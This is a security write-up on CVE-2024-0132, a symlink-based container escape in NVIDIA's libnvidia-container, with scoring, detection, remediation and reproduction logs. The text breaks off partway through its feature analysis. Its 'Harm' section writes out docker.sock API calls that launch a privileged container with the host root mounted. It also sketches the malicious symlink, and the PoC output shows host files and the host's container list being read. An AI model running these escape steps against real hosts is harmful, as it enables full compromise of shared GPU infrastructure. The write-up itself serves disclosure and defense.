The First GPU Container Escape: An Analysis of NVIDIA Container Toolkit CVE-2024-0132



I. Basic Information

| Item | Details | Note |
| --- | --- | --- |
| Project | libnvidia-container, nvidia-container-toolkit | |
| CVE-ID | CVE-2024-0132 | |
| Vuln's Author | Wiz Research: Shir Tamari, Ronen Shustin, Andres Riancho | |
| CVSS | 8.3 CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H | NIST:NVD |
| | 9.0 CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H | CNA: NVIDIA Corporation |
| | 8.6 CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H | ssst0n3 |
| Exploits | github.com/ssst0n3/poc-cve-2024-0132 | |
| Affect Version | libnvidia-container >=v1.0.0, <=v1.16.1 | |
| Fix Version | 1.16.2 | |
| Fix Commit | libnvidia-container PR#282 | |
| Introduce Commit | commit 35a9f27 | |
| Introduce Date | 2018-09-14 | |
| Report Date | 2024-09-01 | |
| Intelligence Gathering Date | 2024-09-30 | |
| Publish Date | 2024-09-26 | |

II. Component Overview

The vulnerability lies in libnvidia-container.so, the library behind nvidia-container-cli; both belong to libnvidia-container. libnvidia-container and a set of related tools together form the NVIDIA Container Toolkit.

The NVIDIA Container Toolkit is a suite of tools from NVIDIA for GPU-accelerated computing in containerized environments. It lets users access NVIDIA GPUs from container platforms such as Docker, so that GPU-dependent workloads like deep-learning training, inference, and scientific computing can run inside containers.

  • libnvidia-container: the low-level library that integrates with container runtimes and is responsible for mounting GPU devices, drivers, and CUDA libraries.
  • nvidia-container-runtime: a container runtime that extends a standard OCI (Open Container Initiative) runtime with GPU acceleration support.
  • nvidia-docker2 (deprecated): the early plugin for using NVIDIA GPUs in Docker containers, since superseded by the NVIDIA Container Toolkit.
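In legacy mode (the default), these components run as a chain; Part VII below walks through each hop in detail. In brief, the path the vulnerable mounts travel is:

docker run --gpus ...
 └─ dockerd: injects the prestart hook into the OCI spec
    └─ nvidia-container-runtime (shim): further modifies the spec
       └─ runc: executes the prestart hooks
          └─ nvidia-container-runtime-hook prestart
             └─ nvidia-container-cli configure (libnvidia-container: nvc_driver_mount, ...)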

III. Vulnerability Authors

1. discoverer

1.1 Shir Tamari


Shir Tamari is an experienced security and technology researcher specializing in vulnerability research and practical hacking techniques. A veteran of the Israel Defense Forces, he is currently Head of Research at the cloud security company Wiz. He has previously consulted for several security companies across research, development, and product roles. He has discovered multiple well-known cloud security vulnerabilities and is one of the authors of the nvidia-container-toolkit container escape CVE-2024-0132.

1.2 Ronen Shustin(ID: Ronen)


Ronen Shustin is an experienced vulnerability researcher focused on cloud security who has worked at well-known organizations including Wiz, Check Point, and Israel's Unit 8200. Ronen has found and reported significant vulnerabilities across multiple cloud platforms, including the libnvidia-container container escape CVE-2024-0132 and issues in Azure PostgreSQL, GCP Cloud SQL, and IBM Cloud Databases for PostgreSQL. He has spoken at several security conferences on cloud security and Kubernetes cluster security, and has repeatedly appeared on the Microsoft Security Response Center's researcher leaderboard.

1.3 Andres Riancho(ID: andresriancho)


Andrés Riancho is an expert focused on offensive application security and on training developers to write secure code. He was Director of Web Security at Rapid7, where he led the team that improved NeXpose's web application scanner. He is the creator of w3af, the open-source web application security scanner that helps users identify and exploit vulnerabilities in web applications. He has also provided security consulting to Latin American unicorns such as MercadoLibre and Despegar. Andrés enjoys speaking at security and developer conferences worldwide, sharing his experience in web application security, exploitation, and cloud security. He lives in Buenos Aires, Argentina, and provides professional services globally.

2. introducer: Jonathan Calmels (ID: 3XX0)

| Role | Person | Contribution | Commits under libnvidia-container |
| --- | --- | --- | --- |
| Author | Jonathan Calmels | Creator, #3: 139 commits, 34,933 ++ / 7,690 -- | commits |


Jonathan Calmels is a systems software engineer at NVIDIA. His work focuses on GPU data-center software and hyperscale solutions for deep learning.

3. fixer: Evan Lezar (ID: elezar)

| Role | Person | Contribution | Commits under libnvidia-container |
| --- | --- | --- | --- |
| Author | Evan Lezar | Contributor, #1: 171 commits, 3,516 ++ / 2,553 -- | commits |

Evan Lezar is an experienced software engineer with both commercial and academic backgrounds and more than a decade of experience across programming languages, roles, and team configurations. Evan works at NVIDIA. He specializes in GPU acceleration with NVIDIA CUDA in computational electromagnetics, has published several papers on the topic, and has participated in multiple international conferences. He is also an active open-source contributor to projects related to NVIDIA GPU management, Kubernetes, and container technology. His work has advanced the state of the art academically and found broad industrial application.

IV. Vulnerability Details

1. Introduction

1.1 Related Feature: CUDA Forward Compatibility

libnvidia-container supports CUDA Forward Compatibility, which lets a container use CUDA libraries newer than the host's driver, so that containerized CUDA applications can run against a newer CUDA version without updating the NVIDIA driver on the host. This is very useful for containerized applications that need newer CUDA features or versions, while preserving compatibility and stability on the host.

Concretely, libnvidia-container mounts the newer CUDA libraries under the container's /usr/local/cuda/compat directory into the container's lib directory.
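For example, the compat libraries ship inside the CUDA images themselves; listing the directory in an unmodified image shows what the toolkit will pick up (the image tag and library version below match the mountinfo output quoted later in this article; listing abbreviated):

$ docker run --rm nvidia/cuda:12.6.2-cudnn-runtime-ubuntu24.04 ls /usr/local/cuda/compat
libcuda.so.560.35.03
...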

1.2 Vulnerability Overview

When handling the CUDA forward compatibility feature, libnvidia-container (the library of the NVIDIA Container Toolkit) mounts files from the container's /usr/local/cuda/compat directory into the container's lib directory (/usr/lib/x86_64-linux-gnu/ and the like). That mount is susceptible to a symlink attack, which lets an arbitrary host directory be mounted read-only into the container and, from there, leads to container escape.
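As a rough illustration of the primitive (a simplified sketch only; the actual PoC lives at github.com/ssst0n3/poc-cve-2024-0132): an attacker-controlled image plants a symlink where libnvidia-container expects the compat directory, so that when the compat libraries are mounted, the mount source resolves to a host path rather than a path inside the image.

# Hypothetical layout inside a malicious image (simplified; not the real PoC)
mkdir -p /usr/local/cuda
ln -s / /usr/local/cuda/compat   # "compat" is now a symlink escaping the rootfs
# When nvc_driver_mount() processes the compat libraries, the symlink
# redirects the mount source, and a host directory ends up bind-mounted
# (read-only) into the container's lib directory.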

2. Impact

2.1 Scope

libnvidia-container >= 1.0.0, <= 1.16.1

For detailed per-version measurements, see: https://github.com/ssst0n3/poc-cve-2024-0132/issues/2

nvidia-container-toolkit and gpu-operator are affected because they depend on libnvidia-container.

nvidia-container-toolkit supports three modes:

  • legacy: the default configuration; affected.
  • cdi: can be enabled manually; not affected.
  • csv: can be enabled manually; not affected. (This mode mainly targets Tegra-based systems without NVML; NVIDIA provides no detailed usage tutorial, so very few users are expected to use it. csv mode requires the user to declare the files and devices to mount by hand, and the vulnerable feature is not involved.)
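To check which mode a given host is actually running, inspect the toolkit's configuration (a quick check assuming the default config path; the exact contents vary by toolkit version, and the output shown is the default). mode = "auto" is resolved by info.ResolveAutoMode, quoted in section 2.4 below; on a typical x86 Linux host it resolves to legacy, the affected mode.

$ grep -E '^mode' /etc/nvidia-container-runtime/config.toml
mode = "auto"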

2.2 Harm

An arbitrary host directory can be mounted read-only into the container; through files such as docker.sock, the container API can then be used to escape the container.
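To make the escape concrete: the PoC mounts the host's / at /host and the host's /run at /host-run, and a unix socket remains usable even from a read-only mount. From there, the Docker Engine API alone is enough to start a fully privileged container. A hedged sketch of that last step; the image name is only an example:

# Create a privileged container with the host's / bind-mounted, then start it
# (plain Docker Engine API calls over the host's docker.sock).
curl -s --unix-socket /host-run/docker.sock -H 'Content-Type: application/json' \
    -d '{"Image": "ubuntu:24.04", "Cmd": ["chroot", "/host", "sh", "-c", "id > /tmp/pwned"], "HostConfig": {"Binds": ["/:/host"], "Privileged": true}}' \
    http://localhost/containers/create?name=escape
curl -s -X POST --unix-socket /host-run/docker.sock http://localhost/containers/escape/start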

2.2.1 CVSS3.1 8.6 (by ssst0n3)

8.6 CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

| Vector | Score | Reason |
| --- | --- | --- |
| Attack Vector | Local | Running a container image is Local by default; for cloud services that run user-supplied containers, this rises to Network |
| Attack Complexity | Low | Exploitation succeeds 100% of the time and no race condition is actually required; NIST:NVD was misled by NVIDIA's advisory into rating this High |
| Privileges Required | None | Running containers is simply how the product is used; no additional privileges are needed |
| User Interaction | Required | A specific image must be run |
| Scope | Changed | Container escape; the authorization boundary changes |
| Confidentiality | High | |
| Integrity | High | |
| Availability | High | |

2.2.2 CVSS3.1 9.0 (by NVIDIA)

9.0 CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

| Vector | Score |
| --- | --- |
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | Low |
| User Interaction | Required |
| Scope | Changed |
| Confidentiality | High |
| Integrity | High |
| Availability | High |

2.2.3 CVSS3.1 8.3 (by NIST:NVD)

8.3 CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

| Vector | Score |
| --- | --- |
| Attack Vector | Network |
| Attack Complexity | High |
| Privileges Required | None |
| User Interaction | Required |
| Scope | Changed |
| Confidentiality | High |
| Integrity | High |
| Availability | High |

2.3 Exploitation Scenarios

Any service that lets users run arbitrary images and use NVIDIA GPUs inside containers is exposed.

V. Defense

1. Checking for the Vulnerability

The following commands confirm whether an affected version is in use.

(1) Check whether /etc/docker/daemon.json or /etc/containerd/config.toml contains an nvidia entry.

The following output indicates that the NVIDIA Container Toolkit is in use:

root@localhost:~# cat /etc/docker/daemon.json  |grep nvidia
        "nvidia": {
            "path": "nvidia-container-runtime"
root@localhost:~# cat /etc/containerd/config.toml  |grep nvidia
        "/usr/bin/nvidia-container-runtime"

(2) Run nvidia-container-runtime --version or a similar command.

The following output shows version 1.16.2, which is not affected by this vulnerability:

root@localhost:~# nvidia-container-runtime --version
NVIDIA Container Runtime version 1.16.2
commit: a5a5833c14a15fd9c86bcece85d5ec6621b65652
spec: 1.2.0

runc version 1.1.12-0ubuntu2~22.04.1
spec: 1.0.2-dev
go: go1.21.1
libseccomp: 2.5.3

2. Remediation

NVIDIA has released fixed versions; upgrading to v1.16.2 or later fixes the issue.

See the official installation guide: https://docs.nvidia.com/datacenter/cloud-native/container-toolkit/latest/install-guide.html
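If the toolkit was installed from NVIDIA's apt repository as in the reproduction steps below, the upgrade can be pinned explicitly (a sketch; the package version strings follow the same pattern as the 1.16.1-1 pins used later in this article):

$ apt-get update && \
    apt-get install -y libnvidia-container1=1.16.2-1 \
    libnvidia-container-tools=1.16.2-1 \
    nvidia-container-toolkit-base=1.16.2-1 \
    nvidia-container-toolkit=1.16.2-1
$ systemctl restart docker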

3. Mitigations

  1. Avoid running untrusted images.
  2. Or use the GPU via CDI; see the official documentation: (https://docs.nvidia.com/datacenter/cloud-native/container-toolkit/latest/cdi-support.html)

4. Detecting Exploitation

(1) Exploitation performs mount syscalls, which can be detected through their arguments.
(2) Alternatively, detect container processes accessing host files.
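For example, with auditd you can record the mount(2) calls issued by nvidia-container-cli and review the mount sources afterwards; a source that resolves outside the expected driver and compat locations is suspicious. A sketch, assuming auditd is installed and the binary path matches your installation:

# Log mount(2) syscalls made by nvidia-container-cli
$ auditctl -a always,exit -F arch=b64 -S mount -F exe=/usr/bin/nvidia-container-cli -k nvct-mounts
# After a GPU container starts, inspect the recorded events
$ ausearch -k nvct-mounts --interpret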

VI. Reproducing the Vulnerability

1. nvidia-container-toolkit

  • Environment: Huawei Cloud Hong Kong ECS (Ubuntu 22.04, NVIDIA driver) + docker v27.1.0 + nvidia-container-toolkit v1.16.1
  • Steps:
    • Run the PoC image
  • Expected result: host files are shown to be readable from inside the container, and the docker API is reachable via docker.sock

For measurements across more versions, see https://github.com/ssst0n3/poc-cve-2024-0132/issues/2

1.1 Environment

I provisioned a Huawei Cloud Hong Kong Elastic Cloud Server with the following configuration:

  • Billing mode: pay-per-use
  • Region/AZ: CN-Hong Kong | randomly assigned
  • Instance flavor: GPU-accelerated | pi2.2xlarge.4 | 8 vCPUs | 32 GiB | GPU: 1 * NVIDIA Tesla T4 / 1 * 16 GiB
  • OS image: Ubuntu 22.04 server 64bit with Tesla Driver 470.223.02 and CUDA 11.4
$ ssh wanglei-gpu3
root@wanglei-gpu3:~# nvidia-smi 
Tue Oct 15 11:13:33 2024       
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 470.223.02   Driver Version: 470.223.02   CUDA Version: 11.4     |
|-------------------------------+----------------------+----------------------+
| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
|                               |                      |               MIG M. |
|===============================+======================+======================|
|   0  Tesla T4            On   | 00000000:00:0D.0 Off |                    0 |
| N/A   30C    P8     9W /  70W |      0MiB / 15109MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+
                                                                               
+-----------------------------------------------------------------------------+
| Processes:                                                                  |
|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
|        ID   ID                                                   Usage      |
|=============================================================================|
|  No running processes found                                                 |
+-----------------------------------------------------------------------------+

Next, install docker and the nvidia-container-toolkit:

root@wanglei-gpu3:~# apt update && apt install docker.io -y
root@wanglei-gpu3:~# curl -fsSL https://nvidia.github.io/libnvidia-container/gpgkey | gpg --dearmor -o /usr/share/keyrings/nvidia-container-toolkit-keyring.gpg \
    && curl -s -L https://nvidia.github.io/libnvidia-container/stable/deb/nvidia-container-toolkit.list | \
    sed 's#deb https://#deb [signed-by=/usr/share/keyrings/nvidia-container-toolkit-keyring.gpg] https://#g' | \
    tee /etc/apt/sources.list.d/nvidia-container-toolkit.list
root@wanglei-gpu3:~# apt-get update && \
    apt-get install -y libnvidia-container1=1.16.1-1 \
    libnvidia-container-tools=1.16.1-1 \
    nvidia-container-toolkit-base=1.16.1-1 \
    nvidia-container-toolkit=1.16.1-1

Configure the nvidia container runtime:

root@wanglei-gpu3:~# nvidia-ctk runtime configure --runtime=docker
WARN[0000] Ignoring runtime-config-override flag for docker 
INFO[0000] Config file does not exist; using empty config 
INFO[0000] Wrote updated config to /etc/docker/daemon.json 
INFO[0000] It is recommended that docker daemon be restarted.
root@wanglei-gpu3:~# systemctl restart docker

The environment details:

root@wanglei-gpu3:~# nvidia-container-cli --version
cli-version: 1.16.1
lib-version: 1.16.1
build date: 2024-07-23T14:57+00:00
build revision: 4c2494f16573b585788a42e9c7bee76ecd48c73d
build compiler: x86_64-linux-gnu-gcc-7 7.5.0
build platform: x86_64
build flags: -D_GNU_SOURCE -D_FORTIFY_SOURCE=2 -DNDEBUG -std=gnu11 -O2 -g -fdata-sections -ffunction-sections -fplan9-extensions -fstack-protector -fno-strict-aliasing -fvisibility=hidden -Wall -Wextra -Wcast-align -Wpointer-arith -Wmissing-prototypes -Wnonnull -Wwrite-strings -Wlogical-op -Wformat=2 -Wmissing-format-attribute -Winit-self -Wshadow -Wstrict-prototypes -Wunreachable-code -Wconversion -Wsign-conversion -Wno-unknown-warning-option -Wno-format-extra-args -Wno-gnu-alignof-expression -Wl,-zrelro -Wl,-znow -Wl,-zdefs -Wl,--gc-sections
root@wanglei-gpu3:~
root@wanglei-gpu3:~# nvidia-container-cli info
NVRM version:   470.223.02
CUDA version:   11.4

Device Index:   0
Device Minor:   0
Model:          Tesla T4
Brand:          Nvidia
GPU UUID:       GPU-03ef96a1-75d6-9917-ed12-4db7f79bfa4b
Bus Location:   00000000:00:0d.0
Architecture:   7.5
root@wanglei-gpu3:~
root@wanglei-gpu3:~# docker info
Client:
 Version:    24.0.7
 Context:    default
 Debug Mode: false

Server:
 Containers: 0
  Running: 0
  Paused: 0
  Stopped: 0
 Images: 0
 Server Version: 24.0.7
 Storage Driver: overlay2
  Backing Filesystem: extfs
  Supports d_type: true
  Using metacopy: false
  Native Overlay Diff: true
  userxattr: false
 Logging Driver: json-file
 Cgroup Driver: systemd
 Cgroup Version: 2
 Plugins:
  Volume: local
  Network: bridge host ipvlan macvlan null overlay
  Log: awslogs fluentd gcplogs gelf journald json-file local logentries splunk syslog
 Swarm: inactive
 Runtimes: io.containerd.runc.v2 nvidia runc
 Default Runtime: runc
 Init Binary: docker-init
 containerd version: 
 runc version: 
 init version: 
 Security Options:
  apparmor
  seccomp
   Profile: builtin
  cgroupns
 Kernel Version: 5.15.0-76-generic
 Operating System: Ubuntu 22.04.2 LTS
 OSType: linux
 Architecture: x86_64
 CPUs: 8
 Total Memory: 31.15GiB
 Name: wanglei-gpu3
 ID: bc9d2464-60ee-458d-93a0-fab77847a4b3
 Docker Root Dir: /var/lib/docker
 Debug Mode: false
 Experimental: false
 Insecure Registries:
  127.0.0.0/8
 Live Restore Enabled: false

1.2 Reproduction

Use the pre-built PoC image ssst0n3/poc-cve-2024-0132, or build it yourself:

root@wanglei-gpu3:~# git clone https://github.com/ssst0n3/poc-cve-2024-0132.git
root@wanglei-gpu3:~# cd poc-cve-2024-0132
root@wanglei-gpu3:~/poc-cve-2024-0132# docker build -t ssst0n3/poc-cve-2024-0132 .
...
root@wanglei-gpu3:~/poc-cve-2024-0132# docker run -ti --runtime=nvidia --gpus=all ssst0n3/poc-cve-2024-0132
+ cat /host/etc/hostname
wanglei-gpu3
+ curl --unix-socket /host-run/docker.sock http://localhost/containers/json
[{"Id":"6dac93a4b9aaa6e2db5bed64f550d111e6e9604375e3210b46b59b095635290f","Names":["/nifty_booth"],"Image":"ssst0n3/poc-cve-2024-0132","ImageID":"sha256:53f3d5c92e144343851ec800aa7a0af201517262498519cc4dfd53688da9b112","Command":"/bin/sh -c /entrypoint.sh","Created":1728996664,"Ports":[],"Labels":{"org.opencontainers.image.ref.name":"ubuntu","org.opencontainers.image.version":"24.04"},"State":"running","Status":"Up Less than a second","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"72649d2ea91c5c657b26de4af617b491e8f09bf9c2e5e8a44695ff10e68191b6","EndpointID":"be81eb91bfafd69bb442f3ccf9790ff5da9ae9ef42ad643aa4a686c3040f404b","Gateway":"172.17.0.1","IPAddress":"172.17.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:02","DriverOpts":null}}},"Mounts":[]}]

2. gpu-operator

  • Environment: Huawei Cloud Hong Kong CCE Standard (k8s v1.30) + docker v24.0.9 + gpu-operator v24.6.1
  • Steps:
    • Run the PoC image
  • Expected result: host files are shown to be readable from inside the container, and the docker API is reachable via docker.sock

The point of testing gpu-operator is to demonstrate that it is affected because of the nvidia-container-toolkit it installs, so other versions were not measured.

2.1 Environment

I provisioned a Huawei Cloud Hong Kong CCE cluster with the following configuration:

  • Billing mode: pay-per-use
  • Cluster version: v1.30
  • Node:
    • Billing mode: pay-per-use
    • Region/AZ: CN-Hong Kong | randomly assigned
    • Instance flavor: GPU-accelerated | pi2.2xlarge.4 | 8 vCPUs | 32 GiB | GPU: 1 * NVIDIA Tesla T4 / 1 * 16 GiB
    • Image: Ubuntu 22.04
root@wanglei-k8s-gpu-02862:~# lspci |grep NVIDIA
00:0d.0 3D controller: NVIDIA Corporation TU104GL [Tesla T4] (rev a1)

Next, install gpu-operator:

$ scp wanglei-k8s-gpu-kubeconfig.yaml wanglei-k8s-gpu-02862:
$ ssh wanglei-k8s-gpu-02862
root@wanglei-k8s-gpu-02862:~# curl -fsSL -o get_helm.sh https://raw.githubusercontent.com/helm/helm/master/scripts/get-helm-3 && chmod 700 get_helm.sh && ./get_helm.sh
Downloading https://get.helm.sh/helm-v3.16.3-linux-amd64.tar.gz
Verifying checksum... Done.
Preparing to install helm into /usr/local/bin
helm installed into /usr/local/bin/helm
root@wanglei-k8s-gpu-02862:~# helm repo add nvidia https://helm.ngc.nvidia.com/nvidia && helm repo update
WARNING: Kubernetes configuration file is group-readable. This is insecure. Location: /root/.kube/config
WARNING: Kubernetes configuration file is world-readable. This is insecure. Location: /root/.kube/config
"nvidia" has been added to your repositories
WARNING: Kubernetes configuration file is group-readable. This is insecure. Location: /root/.kube/config
WARNING: Kubernetes configuration file is world-readable. This is insecure. Location: /root/.kube/config
Hang tight while we grab the latest from your chart repositories...
...Successfully got an update from the "nvidia" chart repository
Update Complete. ⎈Happy Helming!⎈
root@wanglei-k8s-gpu-02862:~# helm install --wait --generate-name -n gpu-operator --create-namespace nvidia/gpu-operator --version=v24.6.1
WARNING: Kubernetes configuration file is group-readable. This is insecure. Location: /root/.kube/config
WARNING: Kubernetes configuration file is world-readable. This is insecure. Location: /root/.kube/config
NAME: gpu-operator-1733143549
LAST DEPLOYED: Mon Dec  2 20:45:52 2024
NAMESPACE: gpu-operator
STATUS: deployed
REVISION: 1
TEST SUITE: None

I hit an Init:CrashLoopBackOff error for reasons I did not track down; deleting the pod and waiting for it to be recreated was enough.

root@wanglei-k8s-gpu-02862:~# kubectl get pods -n gpu-operator
NAME                                                              READY   STATUS                  RESTARTS      AGE
gpu-feature-discovery-nmz44                                       0/1     Init:0/1                0             4m42s
gpu-operator-1733143549-node-feature-discovery-gc-c9474d8bfvxfv   1/1     Running                 0             6m3s
gpu-operator-1733143549-node-feature-discovery-master-86985w2n8   1/1     Running                 0             6m3s
gpu-operator-1733143549-node-feature-discovery-worker-5c7cp       1/1     Running                 0             6m3s
gpu-operator-77fdfcd757-4gxq4                                     1/1     Running                 0             6m3s
nvidia-container-toolkit-daemonset-xnfjx                          1/1     Running                 0             4m42s
nvidia-dcgm-exporter-9d8bp                                        0/1     Init:0/1                0             4m42s
nvidia-device-plugin-daemonset-dz84j                              0/1     Init:0/1                0             4m42s
nvidia-driver-daemonset-w2xmw                                     1/1     Running                 0             5m33s
nvidia-operator-validator-kjc2x                                   0/1     Init:CrashLoopBackOff   3 (23s ago)   4m42s
root@wanglei-k8s-gpu-02862:~# kubectl delete pod -n gpu-operator nvidia-operator-validator-kjc2x
root@wanglei-k8s-gpu-02862:~# kubectl get pods -n gpu-operator
NAME                                                              READY   STATUS      RESTARTS   AGE
gpu-feature-discovery-nmz44                                       1/1     Running     0          8m7s
gpu-operator-1733143549-node-feature-discovery-gc-c9474d8bfvxfv   1/1     Running     0          9m28s
gpu-operator-1733143549-node-feature-discovery-master-86985w2n8   1/1     Running     0          9m28s
gpu-operator-1733143549-node-feature-discovery-worker-5c7cp       1/1     Running     0          9m28s
gpu-operator-77fdfcd757-4gxq4                                     1/1     Running     0          9m28s
nvidia-container-toolkit-daemonset-xnfjx                          1/1     Running     0          8m7s
nvidia-cuda-validator-895qp                                       0/1     Completed   0          2m15s
nvidia-dcgm-exporter-9d8bp                                        1/1     Running     0          8m7s
nvidia-device-plugin-daemonset-2s7z2                              1/1     Running     0          22s
nvidia-driver-daemonset-w2xmw                                     1/1     Running     0          8m58s
nvidia-operator-validator-gd74c                                   1/1     Running     0          2m17s

The environment details:

root@wanglei-k8s-gpu-02862:~# kubectl exec -n gpu-operator nvidia-driver-daemonset-w2xmw nvidia-smi
kubectl exec [POD] [COMMAND] is DEPRECATED and will be removed in a future version. Use kubectl exec [POD] -- [COMMAND] instead.
Mon Dec  2 12:57:22 2024       
+-----------------------------------------------------------------------------------------+
| NVIDIA-SMI 550.90.07              Driver Version: 550.90.07      CUDA Version: 12.4     |
|-----------------------------------------+------------------------+----------------------+
| GPU  Name                 Persistence-M | Bus-Id          Disp.A | Volatile Uncorr. ECC |
| Fan  Temp   Perf          Pwr:Usage/Cap |           Memory-Usage | GPU-Util  Compute M. |
|                                         |                        |               MIG M. |
|=========================================+========================+======================|
|   0  Tesla T4                       On  |   00000000:00:0D.0 Off |                    0 |
| N/A   28C    P8              9W /   70W |       1MiB /  15360MiB |      0%      Default |
|                                         |                        |                  N/A |
+-----------------------------------------+------------------------+----------------------+
                                                                                         
+-----------------------------------------------------------------------------------------+
| Processes:                                                                              |
|  GPU   GI   CI        PID   Type   Process name                              GPU Memory |
|        ID   ID                                                               Usage      |
|=========================================================================================|
|  No running processes found                                                             |
+-----------------------------------------------------------------------------------------+

2.2 Reproduction

root@wanglei-k8s-gpu-02862:~# cat poc-cve-2024-0132.yaml 
apiVersion: v1
kind: Pod
metadata:
  name: poc-cve-2024-0132
spec:
  restartPolicy: OnFailure
  containers:
  - name: poc-cve-2024-0132
    image: "docker.io/ssst0n3/poc-cve-2024-0132:latest"
    imagePullPolicy: IfNotPresent
    resources:
      limits:
        nvidia.com/gpu: 1
root@wanglei-k8s-gpu-02862:~# kubectl apply -f poc-cve-2024-0132.yaml 
pod/poc-cve-2024-0132 created
root@wanglei-k8s-gpu-02862:~# kubectl logs poc-cve-2024-0132
+ cat /host/etc/hostname
wanglei-k8s-gpu-02862
+ curl --unix-socket /host-run/docker.sock http://localhost/containers/json
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 77281    0 77281    0     0  12.6M      0 --:--:-- --:--:-- --:--:-- 14.7M
[{"Id":"5106c279c3a900712370fccaf6d0ee5e8cb40673ca5886a75a9265f7853e5f05","Names":["/k8s_poc-cve-2024-0132_poc-cve-2024-0132_default_09203b3a-10e4-490a-8f86-abdc1b36c8ae_0"],"Image":"sha256:5fa3c2349168a5c8b3927907399ba19e500d8d86e5c84315
...

3. nvidia-container-toolkit (CDI mode): Not Affected

  • Environment: Huawei Cloud Hong Kong ECS (Ubuntu 22.04, NVIDIA driver) + docker v27.1.0 + nvidia-container-toolkit v1.16.1
  • Steps:
    • Run the PoC image
  • Expected result: the PoC fails; host files cannot be read from inside the container, and docker.sock is unreachable

3.1 Environment

Same environment as in section 1.1.

As in section 1.1:

  • install docker and the nvidia-container-toolkit
  • configure the container runtime
$ apt update && apt install docker.io -y
$ curl -fsSL https://nvidia.github.io/libnvidia-container/gpgkey | gpg --dearmor -o /usr/share/keyrings/nvidia-container-toolkit-keyring.gpg \
    && curl -s -L https://nvidia.github.io/libnvidia-container/stable/deb/nvidia-container-toolkit.list | \
    sed 's#deb https://#deb [signed-by=/usr/share/keyrings/nvidia-container-toolkit-keyring.gpg] https://#g' | \
    tee /etc/apt/sources.list.d/nvidia-container-toolkit.list
$ apt-get update && \
    apt-get install -y libnvidia-container1=1.16.1-1 \
    libnvidia-container-tools=1.16.1-1 \
    nvidia-container-toolkit-base=1.16.1-1 \
    nvidia-container-toolkit=1.16.1-1
$ nvidia-ctk runtime configure --runtime=docker
$ systemctl restart docker

After installation, set up CDI mode:

$ nvidia-ctk cdi generate --output=/etc/cdi/nvidia.yaml

3.2 Reproduction: Not Exploitable

root@wanglei-gpu:~# docker run --rm -ti --runtime=nvidia -e NVIDIA_VISIBLE_DEVICES=nvidia.com/gpu=all ssst0n3/poc-cve-2024-0132:latest
+ cat /host/etc/hostname
cat: /host/etc/hostname: Not a directory
+ curl --unix-socket /host-run/docker.sock http://localhost/containers/json
curl: (7) Failed to connect to localhost port 80 after 0 ms: Couldn't connect to server

VII. Vulnerability Analysis

1. Analysis of the Original Feature

1.1 Using NVIDIA GPUs in Containers

Install and use NVIDIA GPU containers by following the official documentation below. nvidia-container-toolkit uses a runc hook to mount the required driver files before the container starts.

  • https://docs.nvidia.com/datacenter/cloud-native/container-toolkit/latest/install-guide.html
  • https://docs.nvidia.com/datacenter/cloud-native/container-toolkit/latest/sample-workload.html
$ docker run --rm --runtime=nvidia --gpus all ubuntu nvidia-smi
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 470.223.02   Driver Version: 470.223.02   CUDA Version: 11.4     |
|-------------------------------+----------------------+----------------------+
| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
|                               |                      |               MIG M. |
|===============================+======================+======================|
|   0  Tesla T4            On   | 00000000:00:0D.0 Off |                    0 |
| N/A   29C    P8     9W /  70W |      0MiB / 15109MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+
                                                                               
+-----------------------------------------------------------------------------+
| Processes:                                                                  |
|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
|        ID   ID                                                   Usage      |
|=============================================================================|
|  No running processes found                                                 |
+-----------------------------------------------------------------------------+

1.2 The CUDA Forward Compatibility Feature of nvidia-container-toolkit

  • Forward compatibility: in computer science and software engineering, forward compatibility is the ability of a system, product, or standard to work with future versions; existing software or hardware keeps functioning, or stays compatible, after future updates.
    • Example: a program compiled against an older version can run in a newer environment.
  • Backward compatibility: the ability of a new version of a system, product, or standard to work with components from older versions.
    • Example: a newer version of a program can read data files produced by older versions.

NVIDIA's official "CUDA Compatibility Guide" (https://docs.nvidia.com/deploy/cuda-compatibility/index.html) explicitly describes CUDA forward compatibility, emphasizing that applications can run on future versions of the CUDA driver and hardware.

"Forward Compatibility: Applications compiled on an earlier CUDA toolkit version can run on newer CUDA drivers and, in some cases, newer GPUs."

NVIDIA's documentation also notes that the CUDA Runtime provides forward compatibility, allowing applications to run on systems with newer driver versions.

"The CUDA runtime built into the CUDA driver guarantees binary compatibility and backward compatibility. Applications compiled against a particular version of the CUDA runtime can therefore run without recompilation on newer CUDA-capable GPUs and on systems with newer drivers."

Concretely, libnvidia-container mounts the newer CUDA libraries under the container's /usr/local/cuda/compat directory into the container's lib directory:

$ docker run --rm --runtime=nvidia --gpus all nvidia/cuda:12.6.2-cudnn-runtime-ubuntu24.04 cat /proc/self/mountinfo |grep compat
